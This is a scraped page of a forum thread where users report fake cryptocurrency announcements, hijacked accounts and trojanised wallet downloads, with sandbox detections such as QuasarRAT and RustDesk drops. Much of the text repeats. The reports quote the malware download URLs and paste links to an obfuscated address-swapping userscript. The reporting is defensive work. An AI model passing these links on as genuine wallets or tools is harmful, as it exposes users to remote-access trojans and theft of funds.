Fake Ann topic: [ANN] RadiumX New PoW coin . No ICO. No Masternode
Wallets
Code:
https://github.com/RadiumXMain/RadiumX/releases/download/v2.0.3/RadiumX_win64_v2.0.3.zip
Site
Code:
radiumxcoin.info (in maintenance)
Topic: Report Malware and Suspicious Links here so Mods can take Action ! - page 4. (Read 37843 times)
October 15, 2024, 05:38:22 AM
Account: aji471 <= Please Banned
Fake Ann topic: [ANN] RadiumX New PoW coin . No ICO. No Masternode
Wallets
Site
Fake Ann topic: [ANN] RadiumX New PoW coin . No ICO. No Masternode
Wallets
Site
October 09, 2024, 11:37:34 AM
We have a new Fake Ann Thread with an Fake Webpage and a Malware download there for [CCCN] Cococoin !
Fake Webpage :
On the Page there is a Link to a Github Account that is only 5 days old and nothing in there.
Fake Github : github.com/coco-meme
On the Webpage there is a download for the Wallet.
And here its getting interesting , when you download the Wallet File and install and run it a lot of things will be happen.
Malware detected : Win64:Evo-gen [Trj]
Account : Anevigra <--- Please ban or Lock that Account and delete the Thread
This user recently woke up from a long period of inactivity.
Registered since October 04, 2021 and not a single post , Hacked or sold Account
Fake Ann Thread : [ANN] [CCCN] Cococoin – The Funniest Meme Coin of the Decade! 🐔🚀
There are more results and investigation about more and other Hacked Accounts i cant post for now but i will write a pm to Cyrus.
Fake Webpage :
Code:
https://cocomemefun.net/
On the Page there is a Link to a Github Account that is only 5 days old and nothing in there.
Fake Github : github.com/coco-meme
On the Webpage there is a download for the Wallet.
Code:
https://download.cocomemefun.net/files/cococoin-qt-windows.zip
And here its getting interesting , when you download the Wallet File and install and run it a lot of things will be happen.
Malware detected : Win64:Evo-gen [Trj]
Code:
Drops script at startup location
Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Dot net compiler compiles file from suspicious location
Suspicious DNS Query for IP Lookup Service APIs
PowerShell Script Run in AppData
Startup Folder File Write
Unsigned DLL Loaded by Windows Utility
Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Dot net compiler compiles file from suspicious location
Suspicious DNS Query for IP Lookup Service APIs
PowerShell Script Run in AppData
Startup Folder File Write
Unsigned DLL Loaded by Windows Utility
Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Code:
SSLBL: Traffic to malicious host (likely QuasarRAT C&C traffic) <--- A Network Trojan was detected
ET MALWARE Observed Malicious SSL Cert (Quasar CnC)
ET MALWARE Generic AsyncRAT Style SSL Cert
SSLBL: Malicious SSL certificate detected (QuasarRAT C&C)
Source : https://www.virustotal.com/gui/file/bbf26e9b118b49791296baf3eca4442de993b2e5931acfa2eb7fe10c0b6d4811/behaviorET MALWARE Observed Malicious SSL Cert (Quasar CnC)
ET MALWARE Generic AsyncRAT Style SSL Cert
SSLBL: Malicious SSL certificate detected (QuasarRAT C&C)
Account : Anevigra <--- Please ban or Lock that Account and delete the Thread
This user recently woke up from a long period of inactivity.
Registered since October 04, 2021 and not a single post , Hacked or sold Account
Fake Ann Thread : [ANN] [CCCN] Cococoin – The Funniest Meme Coin of the Decade! 🐔🚀
Cococoin – The Funniest Meme Coin of the Decade
Code:
Download a CCCN Wallet: https://cocomemefun.net
There are more results and investigation about more and other Hacked Accounts i cant post for now but i will write a pm to Cyrus.
September 30, 2024, 07:30:38 AM
Account: chekamarue <= Please Banned
Fake Ann topic: [ANN] RadiumX New PoW coin . No ICO. No Masternode
Fake Ann topic: [ANN] RadiumX New PoW coin . No ICO. No Masternode
Wallet Address Prefix: P
Wallets
Wallets
Code:
https://github.com/RadiumXMain/RadiumX/releases/download/v2.0.3/RadiumX_win64_v2.0.3.zip
September 30, 2024, 06:31:19 AM
We have a new Fake Ann Thread with an already used Fake Github download Link with Malware for Mulierum again !
Fake Github : github.com/mulierum
The Fake Wallet download file is still the same 114 MB size big.
Account : MSAS <--- Please ban or Lock that Account and delete the Thread
This user recently woke up from a long period of inactivity.
Registered since May 07, 2016 and last post was back in December 14, 2018 , Hacked or sold Account
Fake Ann Thread : [ANN] Mulierum | POW | GhostRider
This post is also a reference for the Github Report !
Fake Github : github.com/mulierum
The Fake Wallet download file is still the same 114 MB size big.
Account : MSAS <--- Please ban or Lock that Account and delete the Thread
This user recently woke up from a long period of inactivity.
Registered since May 07, 2016 and last post was back in December 14, 2018 , Hacked or sold Account
Fake Ann Thread : [ANN] Mulierum | POW | GhostRider
Wallet:
Code:
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
This post is also a reference for the Github Report !
September 22, 2024, 08:39:20 PM
A download file in this post https://bitcointalksearch.org/topic/--5510016 can be malicious.
I checked with Virustotal with URL checking, it's clean. I don't want to download the file and check it with Virustotal but a newbie share a download file is very suspicious.
I checked with Virustotal with URL checking, it's clean. I don't want to download the file and check it with Virustotal but a newbie share a download file is very suspicious.
Code:
Download https://mega.nz/file/HWh0zIoZ#kYdT27HIvOpMGlxX7V28es-5pVNJfSNkhVqBJuGZ0Lo
September 15, 2024, 05:40:15 AM
It's like the Mulierum virus is back, this time from a hacked account. Be vigilant and keep reporting the fake Github.
Account: theseratio This user recently woke up from a long period of inactivity. - Please Ban
Fake ANN: ANN] Mulierum | POW | GhostRider
Account: theseratio This user recently woke up from a long period of inactivity. - Please Ban
Fake ANN: ANN] Mulierum | POW | GhostRider
Code:
[b]Windows:[/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux:[/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
[b]Linux:[/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
September 11, 2024, 05:55:58 AM
We have again an Fake Ann Thread with the Fake Github Malware download Link for Mulierum!
Fake Github : github.com/mulierum
The Wallet File there was just uploaded 40 Min ago with an size of 116 MB
Source : https://www.virustotal.com/gui/file/b1acdc009df8f2af7e45b6216fd94179d05d1b335f4cdbc146a72e3e37d98a53/detection
If you install that Fake Wallet file and starting it it will be a remote desktop access program be installed
Account : CCMS <--- Please ban or Lock that Account and delete the Thread
Last post from that Account was August 14, 2024 , so its freshly hacked or sold.
Fake Ann Thread : [ANN] Mulierum | POW | GhostRider
As always the Thread is self moderated from the hackers.
And another User posted it also
Account : Cholidm <--- Please ban or Lock that Account and delete the Thread
This post is also a reference for the Github Report !
Fake Github : github.com/mulierum
The Wallet File there was just uploaded 40 Min ago with an size of 116 MB
Source : https://www.virustotal.com/gui/file/b1acdc009df8f2af7e45b6216fd94179d05d1b335f4cdbc146a72e3e37d98a53/detection
If you install that Fake Wallet file and starting it it will be a remote desktop access program be installed
Code:
Processes created
"C:\Users\\AppData\Roaming\rustdesk.exe"
C:\Users\\AppData\Roaming\Zlvmon_v3\rustdesk.exe
Sorce : https://www.virustotal.com/gui/file/b1acdc009df8f2af7e45b6216fd94179d05d1b335f4cdbc146a72e3e37d98a53/behavior"C:\Users\
C:\Users\
Account : CCMS <--- Please ban or Lock that Account and delete the Thread
Last post from that Account was August 14, 2024 , so its freshly hacked or sold.
Fake Ann Thread : [ANN] Mulierum | POW | GhostRider
As always the Thread is self moderated from the hackers.
Wallet:
Code:
Windows: https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
Linux: https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
Linux: https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
And another User posted it also
Account : Cholidm <--- Please ban or Lock that Account and delete the Thread
Wallet:
Code:
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz]
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz]
This post is also a reference for the Github Report !
September 04, 2024, 12:03:28 AM
Full member users who just woke up/hacked back are spreading the virus with two threads at once, please be careful.
Account: BlueStone This user recently woke up from a long period of inactivity. - Please Ban
Fake ANN: ANN] Mulierum | POW | GhostRider
Fake ANN: [ANN][SSPOS] CodeBlock Blockchain: Welcome to a New Era
Account: BlueStone This user recently woke up from a long period of inactivity. - Please Ban
Fake ANN: ANN] Mulierum | POW | GhostRider
Code:
[b]Windows: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
Fake ANN: [ANN][SSPOS] CodeBlock Blockchain: Welcome to a New Era
Code:
https://github.com/CodeBlockMainnet/CodeBlock/releases/download/1.3.1/CodeBlock-wallet_v1.3.1.zip
September 02, 2024, 07:12:25 AM
Account: DareToken <= Please Banned
Fake Ann topic: [ANN] Mulierum | POW | GhostRider
Fake Ann topic: [ANN] Mulierum | POW | GhostRider
Wallet:
Code:
[b]Windows: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
August 31, 2024, 03:05:33 AM
The hacked Hero Member account last posted in 2015 and is now actively spreading the virus via Github.
Account: Herbert This user recently woke up from a long period of inactivity. - Please Ban
Fake ANN: ANN] Mulierum | POW | GhostRider
Account: Herbert This user recently woke up from a long period of inactivity. - Please Ban
Fake ANN: ANN] Mulierum | POW | GhostRider
Code:
[b]Windows: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
August 21, 2024, 06:47:07 AM
August 20, 2024, 08:30:40 PM
Yeb its again a Fake Ann with Malware download Link from there Webpage this time for Aldibi
Fake download Wallet File on the Webpage:
Also there is a Fake Github Link on there Page that is already deleted.
Fake Github : github.com/aldibi-coin/core
The sandbox CAPE Sandbox flags this file as: MALWARE RAT
The sandbox Zenbox flags this file as: MALWARE EVADER
Account : qiqikesfket <--- Please ban or Lock that Account and delete the Thread
This user recently woke up from a long period of inactivity.
Registered since October 04, 2021 , Hacked or sold Account
Fake Ann Thread: [ANN] Aldibi: Empowering the Next Era of Global Transactions
Fake download Wallet File on the Webpage:
Code:
download.aldibi.com/files/aldibi-qt-windows.zip
Also there is a Fake Github Link on there Page that is already deleted.
Fake Github : github.com/aldibi-coin/core
The sandbox CAPE Sandbox flags this file as: MALWARE RAT
The sandbox Zenbox flags this file as: MALWARE EVADER
Code:
Drops script at startup location
ET MALWARE Common RAT Connectivity Check Observed
ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
Source : https://www.virustotal.com/gui/file/7fb14f997b1c92cc4d7a70db91657fc01f5feba66c9dd1e1b918567280218e37/behaviorET MALWARE Common RAT Connectivity Check Observed
ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
Account : qiqikesfket <--- Please ban or Lock that Account and delete the Thread
This user recently woke up from a long period of inactivity.
Registered since October 04, 2021 , Hacked or sold Account
Fake Ann Thread: [ANN] Aldibi: Empowering the Next Era of Global Transactions
Aldibi (ALDB)
Code:
https://aldibi.com/
August 20, 2024, 08:03:28 PM
Trojan in the Windows binary available for download from their website: https://aldibi.com/
https://bitcointalksearch.org/topic/--5506809
https://bitcointalksearch.org/topic/--5506809
August 19, 2024, 04:37:34 AM
Account: Tam.Shams <= Please Banned
Fake Ann topic: [ANN] Mulierum | POW | GhostRider
Fake Ann topic: [ANN] Mulierum | POW | GhostRider
Wallet:
Code:
[b]Windows: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
August 15, 2024, 04:09:53 AM
Account: pedpedped101 <= Please Banned
Fake Ann topic: [ANN] Mulierum | POW | GhostRider
Fake Ann topic: [ANN] Mulierum | POW | GhostRider
Wallet:
Code:
[b]Windows: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
August 12, 2024, 08:41:18 AM
Another hacked account spreading the virus via a Github link
Account: ikanunaki accounnt hacked and please ban
Fake ANN: [ANN] Mulierum | POW | GhostRider
Account: ikanunaki accounnt hacked and please ban
Fake ANN: [ANN] Mulierum | POW | GhostRider
Code:
[b]Windows: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
August 12, 2024, 03:42:35 AM
And again we have a new Fake Ann Thread with an Fake Github Account and Malware download Link for Mulierum !
The Fake Github was just created 1 Hour ago.
Fake Github : github.com/mulierum
The Download Wallet File is 100 MB big and the same as we got already in the past.
[/code]
Source : https://www.virustotal.com/gui/file/b6761479c00cffc7e99e820060518b12024e533fbc908da116ecce2a4cb2759d/behavior
Account : havi agasa <--- Please ban or Lock that Account and delete the Thread
This user recently woke up from a long period of inactivity.
Registered since June 08, 2017 , and the last post from that User was back in July 04, 2021 , Hacked or sold Account
Fake Ann Thread : [ANN] Mulierum | POW | GhostRider
This post is also a reference for the Github Report !
The Fake Github was just created 1 Hour ago.
Fake Github : github.com/mulierum
The Download Wallet File is 100 MB big and the same as we got already in the past.
Code:
[code]
C:\Users\\AppData\Roaming\ObjectDock.exe"
C:\Users\\AppData\Roaming\tg_Sync\ObjectDock.exe
C:\Windows\system32\SecurityHealthService.exe
C:\Windows\system32\WerFault.exe -u -p 636 -s 504
Source : https://www.virustotal.com/gui/file/b6761479c00cffc7e99e820060518b12024e533fbc908da116ecce2a4cb2759d/behavior
Account : havi agasa <--- Please ban or Lock that Account and delete the Thread
This user recently woke up from a long period of inactivity.
Registered since June 08, 2017 , and the last post from that User was back in July 04, 2021 , Hacked or sold Account
Fake Ann Thread : [ANN] Mulierum | POW | GhostRider
Mulierum
Wallet:
Wallet:
Code:
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
This post is also a reference for the Github Report !
August 11, 2024, 05:30:29 AM
If anyone has more experience with analyzing obfuscated javascript code and is willing to try, it would be interesting to find out what the script actually does.
I tried using some online tools: https://private.coinsofnakamoto.com/?b4527618e0f7c407#2jRhaSBjdSStxKnJApfAMhszgfJM3mLJv4giXjN94UGz (do not run this, obv).
They seem to pick a random BTC address from the list, replace the one on the page (including the QR code) and then do a call to pipedream with some basic description (which seems to return 204). Very basic stuff honestly.
August 11, 2024, 04:50:32 AM
A potential scam unfolding in the "Question about selling free giftcards" thread - [https://bitcointalk.org/index.php?topic=5505793.0]
Here's what we know:
A new member, Revaniz, claims to have found a method for free gift cards and offers to sell them.
Another new member, WARtoze99, suggested a platform for selling the gift cards only twenty seconds later, then asked for the method to obtain them.
Revaniz provides a Google Drive link claiming to be the exploit method.
The fake exploit method they promote involves installing a greasemonkey/tampermonkey script into the user's browser. The script is heavily obfuscated and undoubtedly contains a malicious payload designed to steal your crypto or worse.
If anyone has more experience with analyzing obfuscated javascript code and is willing to try, it would be interesting to find out what the script actually does.
Here's what we know:
A new member, Revaniz, claims to have found a method for free gift cards and offers to sell them.
Another new member, WARtoze99, suggested a platform for selling the gift cards only twenty seconds later, then asked for the method to obtain them.
Revaniz provides a Google Drive link claiming to be the exploit method.
Code:
https://drive.google.com/file/d/1Mzn6o3n5xIhN6nueBAl3YTzyb27ZgMrD/view?OAxXtfCKIY
The fake exploit method they promote involves installing a greasemonkey/tampermonkey script into the user's browser. The script is heavily obfuscated and undoubtedly contains a malicious payload designed to steal your crypto or worse.
Code:
Link #1 https://paste.sh/7vnaa5T9#rnL_3Gbklz9HKMIUKuPPG3yf
Link #2 (backup) https://files.catbox.moe/1evss2.txt
If anyone has more experience with analyzing obfuscated javascript code and is willing to try, it would be interesting to find out what the script actually does.
hero member
Activity: 1036
Merit: 933
Find your Digital Services at- cryptolibrary.pro
August 11, 2024, 03:53:04 AM
And we got the next Fake Ann Thread with an already used Fake Github Account with Malware , this time for Binarium!
<✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂>
Fake Ann Thread : [ANN] Binarium | POW | GhostRider
owh gosh they are fake !!!<✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂>
Fake Ann Thread : [ANN] Binarium | POW | GhostRider
I just visited their thread and I was also looking at their officials representative social handles for offering some business
.Anyway bad luck for those scammers
thanks again for the catch. Jump to: